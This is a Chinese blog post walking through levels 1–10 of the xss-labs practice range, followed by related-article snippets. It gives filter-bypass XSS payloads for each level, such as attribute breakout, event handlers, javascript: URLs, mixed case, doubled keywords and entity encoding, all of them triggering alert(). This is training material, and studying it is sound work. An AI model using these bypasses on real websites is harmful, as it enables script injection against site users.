xss-labs:level1-level10

最新推荐文章于 2022-05-31 18:03:59 发布
最新推荐文章于 2022-05-31 18:03:59 发布
阅读量987 收藏
点赞数
文章标签: xss javascript web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/124538777
版权

xss-labs通关

level1

首先打开题目得到:

在这里插入图片描述
发现有个参数test请求:

name=<script>alert(1)</script>

得到:

在这里插入图片描述

level2

发现题目:
在这里插入图片描述

有个搜索框是请求keyword,直接xss发现被转义:

在这里插入图片描述

但发现在" "处可以闭合"攻击

所以xss攻击:

"><script>alert(/xss/)</script>

得到:

在这里插入图片描述

level3

直接上xss攻击发现:

在这里插入图片描述

被转义了

看一下源码:

在这里插入图片描述

发现对双引号 " 做了限制,但是却放行了单引号 ’

所以在:

在这里插入图片描述
进行xss攻击,’ 闭合

'οnmοuseοver='alert(/xss/)

需要移动鼠标在文本框触发事件:

在这里插入图片描述

level4:

直接上xss攻击:

<script>alert(/xss/)</script>

发现没有反应看源码:

在这里插入图片描述

发现过滤,但有一处:

在这里插入图片描述

只过滤了<>,所以绕过<>

用上一题的方法," 闭合,触发事件:

"οnmοuseοver="alert(/xss/)

在这里插入图片描述

level5

先上xss攻击看看:

发现:

在这里插入图片描述
发现被做手脚

在尝试事件触发:

在这里插入图片描述

发现也被做手脚

但发现在 " 没有被转义就换个方式,"闭合:

javascript 的伪协议:

"><a href=javascript:alert(/xss/)>

得到: "> 点击触发:

在这里插入图片描述

level6:

发现和上一题过滤差不多,但把href也过滤了

所以,换个思路

试试能不能大小绕过发现成功了:

"><sCrIpt>alert(/xss/)</Script>

需要注意 "> 闭合

在这里插入图片描述

level7

进行各种尝试发现是双写绕过:

"> 闭合xss攻击:

"><scrscriptipt>alert(/xss/)</scrscriptipt>

在这里插入图片描述

level8:

进行各种测试发现啥也不是,是编码绕过

利用hex编码绕过,因为有<a>标签

所以利用javascript伪协议绕过:

javasc&#x72;&#x69;pt:alert(/xss/)

在这里插入图片描述

level9:

还是先进行各种测试发现都是:

在这里插入图片描述
看源码:
在这里插入图片描述

发现必须有: http://

和上一题一样,但要有http://

javasc&#x72;&#x69;pt:alert('http://')

在这里插入图片描述

level10

还是先进行各种测试发现都没有

在看源码发现隐藏的东西:

在这里插入图片描述
三个输入但看源码发现:

在这里插入图片描述

就第三个有用,利用事件触发:

先修改为hidden为text:

在这里插入图片描述

让输入框出来,在xss攻击:

" οnmοuseοver="alert(/xss/)

传入值后发现还被隐藏,在此修改为:test

在这里插入图片描述

触发事件:

在这里插入图片描述

参考连接:

https://blog.csdn.net/ruoli_s/article/details/112690177

南冥~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss-labs/level10
m0_71299382的博客
11-29 207
xss-labs/level10
Xsslabs靶场笔记Level1-10
阿鱼的小世界
11-02 2589
前言 仅练习了前10关,并没有详细解释如何构造payload,如有需求可参考最后的文章。 靶场下载:蓝奏云-密码blhk 正文 payload常用函数 <script>alert(1)</script> <img src=0 onerror="javascript:alert(1)"> <a href=javascript:alert(1)></a> onclick="alert(1)"#鼠标单击触发弹框 onfocus="alert(
XSS之xss-labs-level10
Hugu
02-23 349
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
xss-labs level 1-10 攻略
borrrrring的博客
02-02 636
level 1 我们可以看到在payload中可以看到参数name,值为text,字符的长度为4,参数name的返回值会出现在界面上。 查看源代码 我们可以看到,参数name插入到了标签中,可以得出这是反射型XSS漏洞。 什么是反射型XSS?简单来说,就是当用户在网站的地址栏输入URL,从服务端获取到数据时,网站页面会根据返回的信息而呈现不同的返回页面,如果这个时候恶意用户在页面中输入的数据不经过验证且不经过超文本标记语言的编码就录入到脚本中,就会产生漏洞。 而且在源代码中我们还可以看到有一个关于窗口的语句
xss-labs(level10~20)
qq_39670065的博客
07-25 776
level-10 画风突变,发现并没有输入框 查看源码 会发现<input>之中有三个t_link、t_history、t_sort标签 还是使用<script>alert('xss')</script>进行尝试 会发现<和>均被编码 师傅们的思路是: 因为有三个<input>标签,里面有三个参数,所以尝试从这里入手,构造 <script>alert('xss')</script>&t_link=" type="te
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs.zip
03-18
这个“xss-labs.zip”文件显然是一个专门为学习和理解XSS漏洞而设计的实践平台,包含了20个具有不同XSS特征的网页示例。通过这个实验室,你可以深入学习如何检测、防范以及利用XSS漏洞。 XSS攻击通常分为三种类型:...
xss-labs挑战(一) 1
最新发布
08-08
本文将详细介绍 XSS-labs 挑战(一)1 的知识点,包括挑战的安装、Level 1 无过滤机制、Level 2 闭合标签、Level 3 单引号闭合+htmlspecialchar()函数、Level 4 双引号闭合+添加事件、Level 5 javascript 伪协议等。...
xss-labs通关攻略教程(level1~level 10)
m0_55854679的博客
07-23 4436
level 1 观察题目,发现用户名在url处被提交,且输出用户名的长度为4 2. 查看源码,发现参数未进行任何过滤,猜测为反射型xss 3. 修改name参数为<script>alert("xss")</script> level 2 观察页面提示,发现依然为反射型xss,但是与上一关不同之处在于有了搜索框。 尝试添加与上一关相同的参数 查看源码,发现<和>被HTML字符实体化为&lt、&gt,"被HTML字符实体化为&quot .
XSS跨站脚本攻击(level1-10)
不知名白帽的博客
05-31 2342
XSS(跨站请求伪造)level1-10关的题目讲解。
XSS-Labs挑战笔记Level1-10
When you collect everything, you understand nothing.
10-11 3656
靶场下载地址:https://github.com/lyshark/xss-labs 每一关的后台源码重写了alert()方法,只要成功弹框即可进入下一关 Level 1 后台源码: <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" ...
XSS挑战 level 1-10 解题思路
xavier01zhao的博客
03-09 3931
XSS挑战 level 1-10 解题思路 LV.1 http://152.136.157.62:8081/level1.php?name=test 页面中没有输入点,但发现通过地址栏传入的参数‘name=test’会回显在页面 没有任何过滤 尝试构造payload LV.2 http://152.136.157.62:8081/level2.php?keyword=test 这道题 输入点在url和input里都有了 需要闭合input标签再构造xss LV.3 http://152.136
XSS小游戏学习笔记(level 1-10)
烟敛寒林的博客
09-21 3261
XSS小游戏 level 1 右键查看页面源代码 &lt;script&gt; window.alert = function() { confirm("完成的不错!"); window.location.href="level2.php?keyword=test"; } &lt;/script&gt; 即提示你要让网页弹框,修改url后面的参数 http://l...
记录xss练习 level6-level10(二)
CN_DS的博客
11-28 468
leve6: 1.图一尝试" onclick="alert(),没有成功,于是查看网页源码发现,对onclick事件进行了字符替换,php逻辑有可能是查找关键词,如果找到了就进行字符插入。 2.所以尝试大小写输入,此时php逻辑有可能只关注了小写,on 和 oN On ON是不一样的,但是onclick与Onclick ONclick oNclick是一样的,都可以执行。 3.尝试paylo...
XSS-Game level 10
热门推荐
wangyuxiang946的博客
07-08 1万+
xssgame10,XSS-Game第十关过滤了尖括号 > < , 并且隐藏了输入框 , 使用事件绕过,并使输入框取消隐藏
xss挑战1-10
weixin_45498459的博客
03-09 838
xss level1 代码 xsslevel1代码2第1中方法反射性第二种script标签level 3level4lelvel5scripta标签level6a链接">xss</alevle7lelve8level9level10 <!DOCTYPE html> <!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html...
XSS挑战之旅 解题记录
kynehc
09-06 6031
本文记录xss挑战解题,检验自己的xss技术 题目链接 Level1 链接为http://test.xss.tv/level1.php?name=test 页面没有输入点 直接构造payloadname=alert(1) Level2 一样简单,给出payload">alert(1) Level3 过滤了尖括号 故用`’ onclick=alert(1)// Level4
XSS-labs挑战解析:从Level1到Level3的攻破策略
这篇内容主要介绍了XSS-labs的初阶挑战,包括Level1、Level2和Level3,这是一个用于学习和实践跨站脚本(XSS)攻击的在线平台。XSS攻击是网络安全领域常见的攻击手段,它允许攻击者在用户浏览器上执行恶意脚本,可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值